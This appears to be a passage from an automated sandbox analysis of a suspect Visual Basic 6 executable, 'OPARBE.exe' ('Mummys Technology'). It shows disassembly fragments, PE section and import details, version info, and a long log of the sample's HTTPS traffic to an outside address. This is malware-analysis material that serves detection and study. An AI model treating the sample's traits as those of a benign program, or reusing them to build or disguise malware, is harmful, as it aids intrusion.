add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esp], bl
or eax, CA69BFC2h
inc edi
lodsb
jmp far 22F3h : 4FE1EAFFh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
or eax, 270A0D0Ah
dec ebp
push ebp
dec esi
push edx
inc ebp
push ecx
push ebp
dec ecx
push esp
add byte ptr [0A0D200Ah], cl
or eax, 0000000Ah
add bh, bh
int3
xor dword ptr [eax], eax
sub byte ptr [ecx-1Bh], bl
aaa
int3
std
mov dword ptr [F68E487Eh], eax
pop ebx
or eax, AFD57F95h
jl 00007FF0B45C635Dh
test eax, E711F84Fh
dec edi
pushfd
adc dword ptr [esi+48E65169h], ebx
sub al, 3Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor eax, 470000B5h
add al, byte ptr [eax]
add byte ptr [eax], al
add al, 00h
insd
popad
jc 00007FF0B45C63EFh
add byte ptr [43000501h], cl
dec edi
push esi
inc ebp
push esp
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15054	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x10c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x144d0	0x15000	False	0.33740234375	data	5.19887366844	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0xad4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5a4	0x1000	False	0.1826171875	data	1.71136635862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x173bc	0x1e8	data
RT_GROUP_ICON	0x173a8	0x14	data
RT_VERSION	0x170f0	0x2b8	COM executable for DOS	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	OPARBE
FileVersion	1.00
CompanyName	Mummys Technology
Comments	Mummys Technology
ProductName	Mummys Technology
ProductVersion	1.00
FileDescription	Mummys Technology
OriginalFilename	OPARBE.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 5, 2021 17:01:59.135849953 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.178808928 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.179025888 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.181459904 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.222148895 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229161978 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229185104 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229208946 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229227066 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229264021 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.229285002 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229300976 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.229361057 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.229367018 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.282052040 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.323013067 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.323106050 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.324456930 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.370457888 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.583566904 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.583615065 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.583657026 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.583673000 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.583693981 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.583713055 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.584429026 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.584486008 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.584516048 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.584552050 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.587285995 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.587330103 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.587373972 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.587399960 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.590076923 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.590120077 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.590176105 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.590215921 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.592981100 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.593024015 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.593056917 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.593084097 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.595828056 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.595870972 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.595913887 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.595940113 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.598767042 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.598818064 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.598855972 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.598871946 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.601583958 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.601624966 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.601670027 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.601696968 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.624628067 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.624690056 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.624756098 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.624783993 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.625996113 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.626038074 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.626087904 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.626105070 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.628684044 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.628725052 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.628751993 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.628784895 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.631668091 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.631711960 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.631751060 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.631772041 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.634428024 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.634474039 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.634510994 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.634531021 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.637259007 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.637299061 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.637339115 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.637358904 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.640144110 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.640194893 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.640223026 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.640248060 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.643033981 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.643075943 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.643100023 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.643137932 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.645854950 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.645896912 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.645924091 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.645945072 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.648542881 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.648590088 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.648606062 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.648638964 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.650917053 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.650959969 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.650995970 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.651015043 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.653450012 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.653491974 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.653515100 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.653552055 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.655812025 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.655854940 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.655889034 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.655910015 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.658266068 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.658315897 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.658338070 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.658369064 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.660655975 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.660697937 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.660754919 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.660773039 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.663113117 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.663152933 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.663256884 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.665513992 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.665556908 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.665590048 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.665610075 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.667960882 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.668001890 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.668031931 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.668062925 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.669636965 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.669677019 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.669725895 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.671278954 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.671329021 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.671365976 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.671386957 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.672792912 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.672833920 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.672907114 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.673332930 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.674385071 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.674428940 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.674451113 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.674477100 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.675906897 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.675950050 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.675967932 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.676000118 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.677470922 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.677509069 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.677529097 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.677555084 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.679039955 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.679107904 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.679116964 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.679160118 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.680592060 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.680634975 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.680656910 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.680682898 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.682141066 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.682188988 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.682205915 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.682238102 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.683727026 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.683769941 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.683794975 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.683818102 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.685297966 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.685338020 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.685369015 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.685401917 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.686878920 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.686920881 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.686959982 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.686975002 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.688422918 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.688465118 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.688488007 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.688558102 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.690001011 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.690045118 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.690092087 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.690709114 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.691587925 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.691629887 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.691652060 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.691683054 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.693111897 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.693154097 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.693254948 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.694706917 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.694756985 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.694797993 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.694813013 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.696222067 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.696259022 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.696286917 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.696341038 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.697776079 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.697818041 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.697834969 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.697866917 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.699325085 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.699387074 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.699409008 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.699436903 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.700890064 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.700936079 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.700953960 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.700984001 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.702296972 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.702339888 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.702353954 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.702390909 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.703739882 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.703782082 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.703809977 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.703829050 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.705209017 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.705255032 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.705286980 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.705298901 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.706676006 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.706727028 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.706737995 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.706779957 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.707967043 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.708009005 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.708023071 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.708049059 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.709404945 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.709467888 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.709506989 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.709522963 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.710848093 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.710890055 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.710915089 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.710957050 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.711977005 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.712019920 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.712052107 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.712069988 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.712907076 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.712950945 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.712966919 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.713001013 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.713721991 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.713772058 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.713789940 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.713824034 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.714622021 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.714667082 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.714694023 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.714730024 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.715557098 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.715600967 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.715622902 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.715647936 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.716402054 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.716444016 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.716461897 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.716490984 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.717257023 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.717299938 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.717338085 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.717356920 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.718115091 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.718157053 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.718172073 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.718204975 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.718965054 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.719003916 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.719038010 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.719055891 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.719961882 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.720004082 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.720036030 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.720055103 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.720724106 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.720772028 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.720808029 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.720824957 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.721560955 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.721601009 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.721695900 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.721751928 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.722481966 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.722526073 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.722553015 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.722573996 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.723244905 CEST	443	49766	216.58.212.129	192.168.2.4
